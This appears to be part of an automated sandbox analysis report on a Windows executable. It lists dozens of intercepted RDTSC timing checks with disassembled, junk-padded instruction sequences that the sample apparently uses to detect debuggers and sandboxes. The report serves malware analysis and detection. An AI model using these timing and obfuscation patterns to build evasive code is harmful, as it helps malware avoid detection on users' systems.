                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7A1FC6 second address: 7A1FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF628D73F64h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7A1FE0 second address: 7A2001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FF628B69586h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7A2001 second address: 7A2007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7A9F5F second address: 7A9F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF628B6958Eh 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jmp 00007FF628B6958Dh 0x00000015 pop esi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007FF628B69586h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AA06F second address: 7AA07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF628D73F56h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AA07A second address: 7AA0A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF628B69588h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AA0A1 second address: 7AA0C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FF628D73F56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AA0C2 second address: 7AA0EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FF628B69592h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FF628B6958Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEA87 second address: 7AEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FF628D73F56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEA96 second address: 7AEA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEA9B second address: 7AEAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F60h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEAB1 second address: 7AEAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEAB5 second address: 7AEAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEAC2 second address: 7AEADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF628B6958Ch 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEADB second address: 7AEAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEAE1 second address: 7AEAF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF628B6958Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AED43 second address: 7AED4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FF628D73F56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AED4F second address: 7AED97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF628B6958Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jnc 00007FF628B69586h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 ja 00007FF628B6958Ch 0x0000001f jnl 00007FF628B69586h 0x00000025 push edx 0x00000026 jng 00007FF628B69586h 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FF628B69597h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEF11 second address: 7AEF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F69h 0x00000009 popad 0x0000000a jmp 00007FF628D73F65h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEF47 second address: 7AEF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF628B69586h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEF56 second address: 7AEF73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F63h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEF73 second address: 7AEF77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7AEF77 second address: 7AEF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7B4A2C second address: 7B4A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B4A38 second address: 7B4A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B4A3C second address: 7B4A46 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B3EEB second address: 7B3F1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F62h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF628D73F61h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B3F1A second address: 7B3F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B42ED second address: 7B42F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B42F2 second address: 7B42FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B472D second address: 7B4731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B4731 second address: 7B4755 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jbe 00007FF628B6958Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FF628B69586h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B4755 second address: 7B4759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B4759 second address: 7B4770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF628B69586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push ebx 0x0000000f jo 00007FF628B69586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 745EB8 second address: 745EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B7F4F second address: 7B7F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B7F5B second address: 7B7F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B7F5F second address: 7B7F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786B1C second address: 786B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786B21 second address: 5C7F11 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628B6958Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnc 00007FF628B69594h 0x00000013 push dword ptr [ebp+122D14DDh] 0x00000019 mov dword ptr [ebp+122D28EAh], eax 0x0000001f call dword ptr [ebp+122D1F1Fh] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D1CE9h], ebx 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov di, B370h 0x00000033 or dword ptr [ebp+122D20C9h], ebx 0x00000039 popad 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e pushad 0x0000003f mov ah, 48h 0x00000041 mov esi, dword ptr [ebp+122D2CD1h] 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D2DB9h], eax 0x0000004e stc 0x0000004f stc 0x00000050 mov esi, 0000003Ch 0x00000055 jmp 00007FF628B69594h 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e stc 0x0000005f cld 0x00000060 lodsw 0x00000062 add dword ptr [ebp+122D1CE9h], ecx 0x00000068 jmp 00007FF628B6958Ah 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jns 00007FF628B69592h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b stc 0x0000007c mov dword ptr [ebp+122D1CE9h], ebx 0x00000082 nop 0x00000083 je 00007FF628B69592h 0x00000089 jnp 00007FF628B6958Ch 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 jmp 00007FF628B69593h 0x00000097 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786BA8 second address: 786BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786BBB second address: 786BD5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF628B69588h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FF628B69586h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786BD5 second address: 786BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786BEE second address: 786C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c jmp 00007FF628B6958Ch 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jmp 00007FF628B69594h 0x0000001b pop eax 0x0000001c or dh, 00000000h 0x0000001f call 00007FF628B69589h 0x00000024 jnl 00007FF628B69594h 0x0000002a push eax 0x0000002b jmp 00007FF628B6958Ch 0x00000030 pop eax 0x00000031 push eax 0x00000032 jmp 00007FF628B6958Dh 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push esi 0x0000003c jnp 00007FF628B6958Ch 0x00000042 pop esi 0x00000043 mov eax, dword ptr [eax] 0x00000045 jmp 00007FF628B6958Bh 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jnp 00007FF628B6958Ch 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786C89 second address: 786C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786E49 second address: 786E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FF628B6958Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786E67 second address: 786E6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 786E6C second address: 786E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7876AE second address: 7876DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FF628D73F64h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7876DF second address: 7876EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 78788C second address: 7878A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628D73F58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007FF628D73F58h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7878A6 second address: 768086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF628B69588h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 jmp 00007FF628B69596h 0x00000028 call 00007FF628B69590h 0x0000002d mov dword ptr [ebp+122D2366h], edi 0x00000033 pop ebx 0x00000034 popad 0x00000035 call dword ptr [ebp+12460AC4h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007FF628B6958Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 768086 second address: 76808A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76808A second address: 76808F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B866A second address: 7B866E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 78670E second address: 786A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, ebx 0x00000006 mov dword ptr [ebp+122D22D0h], edx 0x0000000c jg 00007FF628B6958Ch 0x00000012 xor dword ptr [ebp+122D353Eh], ebx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FF628B69588h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 mov ecx, dword ptr [ebp+122D2C6Dh] 0x0000003f adc dl, FFFFFFB2h 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push eax 0x0000004a sub dword ptr [ebp+122D353Eh], edi 0x00000050 pop ecx 0x00000051 mov dword ptr [ebp+1249236Ah], esp 0x00000057 jmp 00007FF628B69596h 0x0000005c cmp dword ptr [ebp+122D2EBDh], 00000000h 0x00000063 jne 00007FF628B69627h 0x00000069 cmp dword ptr [ebp+122D2D09h], 00000000h 0x00000070 jne 00007FF628B6966Eh 0x00000076 cmp dword ptr [ebp+122D2CE5h], 00000000h 0x0000007d jne 00007FF628B6964Bh 0x00000083 mov byte ptr [ebp+122D37EBh], 0000006Ch 0x0000008a mov cx, di 0x0000008d mov eax, DB057083h 0x00000092 movzx ecx, dx 0x00000095 nop 0x00000096 pushad 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a popad 0x0000009b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7B8C42 second address: 7B8C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7BD160 second address: 7BD16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007FF628B69586h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C1743 second address: 7C1750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF628D73F56h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C1750 second address: 7C1767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007FF628B69586h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C18AF second address: 7C18B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C1DEB second address: 7C1DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C2514 second address: 7C2539 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF628D73F58h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FF628D73F5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C2539 second address: 7C253E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C253E second address: 7C2557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF628D73F64h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7C8BEE second address: 7C8BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7CBE95 second address: 7CBEAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F64h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7CBEAD second address: 7CBEB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7CBEB1 second address: 7CBEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7386D9 second address: 7386DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7386DD second address: 7386F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7386F1 second address: 73870E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF628B69597h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D2B3C second address: 7D2B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D2B42 second address: 7D2B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1575 second address: 7D1588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FF628D73F56h 0x00000009 jnc 00007FF628D73F56h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D16FD second address: 7D1702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1702 second address: 7D1707 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
